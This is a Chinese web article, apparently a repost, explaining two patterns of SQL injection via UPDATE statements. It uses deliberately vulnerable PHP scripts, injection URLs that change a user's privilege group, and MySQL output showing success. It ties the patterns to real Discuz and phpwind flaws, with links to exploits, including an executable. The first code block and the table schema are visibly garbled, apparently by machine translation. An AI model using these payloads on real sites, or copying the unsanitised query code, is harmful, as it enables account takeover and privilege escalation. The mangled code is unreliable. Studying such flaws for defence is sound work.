今天就跟大家聊聊有关更新注射的两个模式是什么,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。
一。测试环境:
OS:Windowsxpsp2
php:php4.3.10(
mysql4.1.9
apache1.3.33
二。测试数据库结构:
开始
-数据库: `测试`
-
-
-
-表的结构` userinfo
-
CREATETABLE`userinfo `(
` groudid ' varchar(12)NOTNULLdefault ' 1 ',
“用户”varchar(12)NOTNULLdefault“黑格”,
' pass ' varchar(122)NOTNULLdefault ' 123456 '
)ENGINE=MyISAMDEFAULTCHARSET=latin1;
-
-导出表中的数据` userinfo
-
INSERTINTO`userinfo`VALUES('2 ','黑格',' 123456 ');
-结束-
三。测试模式:
1,变量没有带''或[MOD1]
?服务器端编程语言(专业超文本预处理器的缩写)
//test1.phpMod1
$ servername=' localhost
$ db username=" root
$ dbpassword=
$ dbname='测试
mysql_connect($servername,$dbusername,$dbpassword)ordie('数据库连接失败');
$ SQL=' updateuserinfosetpass=$ pwhereuser='黑格;//- $P没有使用单引号
$result=mysql_db_query($dbname,$ SQL);
$ user info=MySQL _ fetch _ array($ result);
"回声"
SQLQuery:$sql
;
?
脚本里只是修改用户='黑格'的通过,如果格鲁德表示用户的权限等级,我们的目的就是通过构造$p来达
到修改组名的目的:
那么我们提交:http://127.0.0.1/test1.php?p=123456,groudid=1
在关系型数据库里查询:mysqlselect * fromuserinfo
- - -
|groudid|user |pass |
- - -
| 1 |黑格|123456|
- - -
1 owinset(0.01秒)
用户黑格的格鲁德又2改为一了:)
所以我们可以得到没有’’或"" update的注射是可以成功的,这个就是我们的模式1。
2,变量带’’或""[MOD2]
?php
//test2.php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");
$sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P使用单引号
$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);
echo "
SQL Query:$sql
";
?>
为了关闭’我们构造$p应该为123456’,groudid=’2 提交:
http://127.0.0.1/test2.php?p=123456’,groudid=’1 在gpc=on的情况下’变成了’
提交的语句变成:SQL Query:update userinfo set pass=’123456’,groudid=’1’ where user=’heige’
mysql查询:
mysql> select * from userinfo;
+---------+-------+--------------------+
| groudid | user | pass |
+---------+-------+--------------------+
| 2 | heige | 123456’,groudid=’1 |
+---------+-------+--------------------+
1 row in set (0.00 sec)
groudid并没有被修改。那么在变量被’’或""时 就完全没有被注射呢?不是 下面我们看模式2: <?php
//test3.php Mod2
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");
$sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P使用单引号
$result = mysql_db_query($dbname, $sql);
mysql_fetch_array($result); //$p的数据写入数据库
$sql= "select pass from userinfo where user=’heige’";
$result = mysql_db_query($dbname, $sql);
$userinfo=mysql_fetch_array($result);
echo $userinfo[0]; //把pass查询输出给$userinfo[0]
$sql ="update userinfo set pass=’$userinfo[0]’ where user=’heige’";
$result = mysql_db_query($dbname, $sql);
mysql_fetch_array($result); //把$userinfo[0] 再次update
?>
我们测试下,提交:http://127.0.0.1/test3.php?p=123456’,groudid=’1
回mysql查询下 : mysql> select * from userinfo;
+---------+-------+--------+
| groudid | user | pass |
+---------+-------+--------+
| 1 | heige | 123456 |
+---------+-------+--------+
1 row in set (0.00 sec)
HaHa~~ 成功注射 修改groudid为1。 这个就是我们的模式2了,简单的描叙如下:
update-->select-->update
四.实际模式
模式1:Discuz 2.0/2.2 register.php 注射
漏洞分析:http://4ngel.net/article/41.htm
Discuz 2.0/2.2 register.php Remote Exploit :http://4ngel.net/project/discuz_reg.htm
模式2:phpwind 2.0.2和3.31e 权限提升漏洞
漏洞分析:
update (profile.php 注射变量为$proicon update语句里为,icon=’$userdb’)
|
v
select (jop.php)
|
v
updtate (jop.php)
Exploit:http://www.huij.net/9xiao/up/phpwind-exploit.exe
看完上述内容,你们对UPDATE注射的两个模式是什么有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注行业资讯频道,感谢大家的支持。
内容来源网络,如有侵权,联系删除,本文地址:https://www.230890.com/zhan/35997.html